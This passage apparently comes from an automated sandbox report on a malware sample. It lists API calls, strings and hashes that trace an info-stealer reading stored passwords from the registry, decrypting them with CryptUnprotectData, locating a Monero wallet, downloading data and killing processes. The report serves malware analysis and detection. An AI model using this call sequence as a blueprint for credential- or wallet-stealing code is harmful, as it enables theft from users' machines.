                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: 06573db99fa04b5e786c38e68d2f44c26474462c9a3ce0f6bddb168c5f89c6da
                        • Instruction ID: 2a03d1ea9019f5f06bc1471757ff4be602a07881b4db3f422aa449cff5afa77e
                        • Opcode Fuzzy Hash: 06573db99fa04b5e786c38e68d2f44c26474462c9a3ce0f6bddb168c5f89c6da
                        • Instruction Fuzzy Hash: A6A17170A002058FEB25DF25D989AAEB7F1EF44309F54846EF80997361DB79DC41CB98
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465F2A
                        • std::_Xinvalid_argument.LIBCPMT ref: 00465F49
                        • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00466014
                        • memmove.MSVCRT(00000000,00000000,?), ref: 0046609F
                        • std::_Xinvalid_argument.LIBCPMT ref: 004660D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$memmove
                        • String ID: invalid string position$string too long
                        • API String ID: 1975243496-4289949731
                        • Opcode ID: 53a76e9df8eeeb0ccf76126f6e897b034f97c74fb5582151fe3c89add0a05a1c
                        • Instruction ID: 1fc2d3a47929b230c1d603a87bec73dc85cc303799d20e40c2bb6323e1f80d29
                        • Opcode Fuzzy Hash: 53a76e9df8eeeb0ccf76126f6e897b034f97c74fb5582151fe3c89add0a05a1c
                        • Instruction Fuzzy Hash: C8618F70700604DBDB18CF5CC99496EB7B6EF85304B244A2AE592C7781E739ED818B9F
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E07D
                        • lstrcat.KERNEL32(?,?), ref: 0045E098
                        • lstrcat.KERNEL32(?,?), ref: 0045E0AC
                        • lstrcat.KERNEL32(?,0157B6D0), ref: 0045E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0045E0D4
                        • lstrcat.KERNEL32(?,0158DA90), ref: 0045E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0045E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFile
                        • String ID:
                        • API String ID: 3428472996-0
                        • Opcode ID: 47d126707365b1da53a11777e068a1fbe7aa1c329713dbc617ea7a60b1138200
                        • Instruction ID: b8ab921e04006716fbc2a157d6bca77d1ee8fd9e12bbf374179749e690becd0f
                        • Opcode Fuzzy Hash: 47d126707365b1da53a11777e068a1fbe7aa1c329713dbc617ea7a60b1138200
                        • Instruction Fuzzy Hash: 6341C37191011C9BCB29EB64DD48ADEB3B5BF48300F5049AAF909A3351DB789F858FA4
                        APIs
                          • Part of subcall function 004477D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00447805
                          • Part of subcall function 004477D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0044784A
                          • Part of subcall function 004477D0: StrStrA.SHLWAPI(?,Password), ref: 004478B8
                          • Part of subcall function 004477D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004478EC
                          • Part of subcall function 004477D0: HeapFree.KERNEL32(00000000), ref: 004478F3
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 00447A90
                        • lstrcat.KERNEL32(00000000,?), ref: 00447ABD
                        • lstrcat.KERNEL32(00000000, : ), ref: 00447ACF
                        • lstrcat.KERNEL32(00000000,?), ref: 00447AF0
                        • wsprintfA.USER32 ref: 00447B10
                        • lstrcpy.KERNEL32(00000000,?), ref: 00447B39
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00447B47
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 00447B60
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                        • String ID: :
                        • API String ID: 398153587-3653984579
                        • Opcode ID: 54bd5aca9aa6b036ef0ff4b517f022bc16d28f09ebee4d60867399473f811f64
                        • Instruction ID: c79adc6e9dba4224ebfc4f0a9c0371bfebee25126ef9cb94c82f562f20ce1d7a
                        • Opcode Fuzzy Hash: 54bd5aca9aa6b036ef0ff4b517f022bc16d28f09ebee4d60867399473f811f64
                        • Instruction Fuzzy Hash: 2B31C972A50214EFDB14DB64DC489AFB7BAEB84714B14451EE60D93300DB78ED42CB64
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 0045820C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00458243
                        • lstrlen.KERNEL32(00000000), ref: 00458260
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00458297
                        • lstrlen.KERNEL32(00000000), ref: 004582B4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004582EB
                        • lstrlen.KERNEL32(00000000), ref: 00458308
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00458337
                        • lstrlen.KERNEL32(00000000), ref: 00458351
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00458380
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 055a7e1b2d1574c00619839eba2d9a7cf5782a4f7785395d7c4ae8f52584bcb9
                        • Instruction ID: fe1ccf206be6b8882f295da2f4de3c5163688ad237984763d5e64837e921a0c4
                        • Opcode Fuzzy Hash: 055a7e1b2d1574c00619839eba2d9a7cf5782a4f7785395d7c4ae8f52584bcb9
                        • Instruction Fuzzy Hash: F0517B70A006029BEB14DF39D958A6BBBA8EF04741F00456ABD06EB345DF38ED54CBE4
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00447805
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0044784A
                        • StrStrA.SHLWAPI(?,Password), ref: 004478B8
                          • Part of subcall function 00447750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0044775E
                          • Part of subcall function 00447750: RtlAllocateHeap.NTDLL(00000000), ref: 00447765
                          • Part of subcall function 00447750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0044778D
                          • Part of subcall function 00447750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004477AD
                          • Part of subcall function 00447750: LocalFree.KERNEL32(?), ref: 004477B7
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004478EC
                        • HeapFree.KERNEL32(00000000), ref: 004478F3
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00447A35
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                        • String ID: Password
                        • API String ID: 356768136-3434357891
                        • Opcode ID: a9d2e4a8f4d5b138ecb836dc7e3d341099c048787a81fa4efc4656c0f701adbf
                        • Instruction ID: 629628d486e24949fba0e71a00e32bdf9bba2afaeb780aa9db8334a362af856c
                        • Opcode Fuzzy Hash: a9d2e4a8f4d5b138ecb836dc7e3d341099c048787a81fa4efc4656c0f701adbf
                        • Instruction Fuzzy Hash: A67131B1D0021DAFEB10DF95CC80AEEB7B9FF49300F14456AE509A7200EB756A85CFA5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00441135
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0044113C
                        • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00441159
                        • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00441173
                        • RegCloseKey.ADVAPI32(?), ref: 0044117D
                        Strings
                        • SOFTWARE\monero-project\monero-core, xrefs: 0044114F
                        • wallet_path, xrefs: 0044116D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                        • API String ID: 3225020163-4244082812
                        • Opcode ID: 87919bcbe2c7f81648d3c575dc6fdb8c7d3ece5d4560dca3bd0a173f694523be
                        • Instruction ID: acdece487a35c4c1dac8f0b1f1da885bca53d006ee41f5fbfe009e13c8f268c5
                        • Opcode Fuzzy Hash: 87919bcbe2c7f81648d3c575dc6fdb8c7d3ece5d4560dca3bd0a173f694523be
                        • Instruction Fuzzy Hash: CCF03075680308BFE7189BE49C4EFEB7B7DEB04755F104155FE09E2290E6B45A8487A0
                        APIs
                        • memcmp.MSVCRT(?,v20,00000003), ref: 00449E04
                        • memcmp.MSVCRT(?,v10,00000003), ref: 00449E42
                        • LocalAlloc.KERNEL32(00000040), ref: 00449EA7
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        • lstrcpy.KERNEL32(00000000,00474C48), ref: 00449FB2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemcmp$AllocLocal
                        • String ID: @$v10$v20
                        • API String ID: 102826412-278772428
                        • Opcode ID: a61bc1a939d5aa48046c4e264bf3c77a763fbace49a49633a999d4481034f07e
                        • Instruction ID: bfc2098adcdbeb85ece1ad7de23077da2143a5bc7a4220fa2142cc69e21a8a48
                        • Opcode Fuzzy Hash: a61bc1a939d5aa48046c4e264bf3c77a763fbace49a49633a999d4481034f07e
                        • Instruction Fuzzy Hash: 0F51B331A102099BEB10EF65DD41B9FB7A4AF44318F15402AFD09EB341DBB8ED4587D9
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0044565A
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00445661
                        • InternetOpenA.WININET(0046CFEC,00000000,00000000,00000000,00000000), ref: 00445677
                        • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00445692
                        • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004456BC
                        • memcpy.MSVCRT(00000000,?,00000001), ref: 004456E1
                        • InternetCloseHandle.WININET(?), ref: 004456FA
                        • InternetCloseHandle.WININET(00000000), ref: 00445701
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                        • String ID:
                        • API String ID: 1008454911-0
                        • Opcode ID: 7f9f235aa8ce166ad4bf70f9fd1e81377afd866ce3eff01b2a9742c1e7d1c73e
                        • Instruction ID: 542437104be0d8640295e7459f21f23339f05d1bacd14efa85ed775f2925dd60
                        • Opcode Fuzzy Hash: 7f9f235aa8ce166ad4bf70f9fd1e81377afd866ce3eff01b2a9742c1e7d1c73e
                        • Instruction Fuzzy Hash: 3D417C70A00205AFEB18DF54DD88BAAB7B5FF48314F14816AE9089B391E7759981CF98
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00464759
                        • Process32First.KERNEL32(00000000,00000128), ref: 00464769
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0046477B
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046479C
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004647AB
                        • CloseHandle.KERNEL32(00000000), ref: 004647B2
                        • Process32Next.KERNEL32(00000000,00000128), ref: 004647C0
                        • CloseHandle.KERNEL32(00000000), ref: 004647CB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 46d6b6878b3954efab85a999a47525e8dc004693e46895489d8eb6cd86c77ee6
                        • Instruction ID: 98b99a146fd252bc4ed023d6a7cceea51b32e27c88aec68f1dd2ed193af22ffb
                        • Opcode Fuzzy Hash: 46d6b6878b3954efab85a999a47525e8dc004693e46895489d8eb6cd86c77ee6
                        • Instruction Fuzzy Hash: 41019271641214AFEB245F709C8DFEB77BDEB88752F001195F90D91280EF788DC08A65
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00458435
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045846C
                        • lstrlen.KERNEL32(00000000), ref: 004584B2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004584E9
                        • lstrlen.KERNEL32(00000000), ref: 004584FF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045852E
                        • StrCmpCA.SHLWAPI(00000000,00474C3C), ref: 0045853E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: d8582f1e5f175919003cf9778703af2088094ef85d6342fc47cf3643aa8154d9
                        • Instruction ID: 42c89f51ab314136e31d8f0fa2fcb1509a1bd891d06895a4dd5f8598b395e7e8
                        • Opcode Fuzzy Hash: d8582f1e5f175919003cf9778703af2088094ef85d6342fc47cf3643aa8154d9
                        • Instruction Fuzzy Hash: E9518C71500206AFDB24DF29D984A5BB7F5EF49340B24841EEC45AB306EF38E945CB64
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00462925
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0046292C
                        • RegOpenKeyExA.ADVAPI32(80000002,0157C208,00000000,00020119,004628A9), ref: 0046294B
                        • RegQueryValueExA.ADVAPI32(004628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00462965
                        • RegCloseKey.ADVAPI32(004628A9), ref: 0046296F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: a0c0b21f988fd7e1efa73962716f39f67099f99fae193b89bded03b6381d7c37
                        • Instruction ID: 1e3c7a71c978464eebf7454584dc23acc8e6bcf89af0c1b7c4b4c5d0e765800a
                        • Opcode Fuzzy Hash: a0c0b21f988fd7e1efa73962716f39f67099f99fae193b89bded03b6381d7c37
                        • Instruction Fuzzy Hash: 2A01B1B5A40214BFD314CBA09C59EEB7BBDEB48755F200059FE4997240EA75594887A0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00462895
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0046289C
                          • Part of subcall function 00462910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00462925
                          • Part of subcall function 00462910: RtlAllocateHeap.NTDLL(00000000), ref: 0046292C
                          • Part of subcall function 00462910: RegOpenKeyExA.ADVAPI32(80000002,0157C208,00000000,00020119,004628A9), ref: 0046294B
                          • Part of subcall function 00462910: RegQueryValueExA.ADVAPI32(004628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00462965
                          • Part of subcall function 00462910: RegCloseKey.ADVAPI32(004628A9), ref: 0046296F
                        • RegOpenKeyExA.ADVAPI32(80000002,0157C208,00000000,00020119,00459500), ref: 004628D1
                        • RegQueryValueExA.ADVAPI32(00459500,0158E268,00000000,00000000,00000000,000000FF), ref: 004628EC
                        • RegCloseKey.ADVAPI32(00459500), ref: 004628F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 5b64299f176952ccb11e456a4417751734a97e16a5d5d35471b9fdb2232bbdbf
                        • Instruction ID: 9e89fb6a2a198db35d0c029d964a16976c80dcc99e5496789f731f01b003c878
                        • Opcode Fuzzy Hash: 5b64299f176952ccb11e456a4417751734a97e16a5d5d35471b9fdb2232bbdbf
                        • Instruction Fuzzy Hash: FD01A2B1640208BFD718ABA4AD4DEAA776EEB44715F004159FE0CD7250EAB45D8487A1
                        APIs
                        • LoadLibraryA.KERNEL32(?), ref: 0044723E
                        • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00447279
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00447280
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004472C3
                        • HeapFree.KERNEL32(00000000), ref: 004472CA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00447329
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                        • String ID:
                        • API String ID: 174687898-0
                        • Opcode ID: e5a8d0b8144b521ab4a8d514f3e45f4d228c88946224b96dc74b612e47ffe619
                        • Instruction ID: eb5f445a8d6a8238a03cb3c233a7db4f76eee644542ca357ae0a5eed87f88482
                        • Opcode Fuzzy Hash: e5a8d0b8144b521ab4a8d514f3e45f4d228c88946224b96dc74b612e47ffe619
                        • Instruction Fuzzy Hash: A8418D717046069BEB20CF69DC84BAAB3E9FB88305F1445AAEC4DC7340E735E941DB64
                        APIs
                        • memset.MSVCRT ref: 0045D7D6
                        • RegOpenKeyExA.ADVAPI32(80000001,0158DAB0,00000000,00020119,?), ref: 0045D7F5
                        • RegQueryValueExA.ADVAPI32(?,0158E400,00000000,00000000,00000000,000000FF), ref: 0045D819
                        • RegCloseKey.ADVAPI32(?), ref: 0045D823
                        • lstrcat.KERNEL32(?,00000000), ref: 0045D848
                        • lstrcat.KERNEL32(?,0158E4C0), ref: 0045D85C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
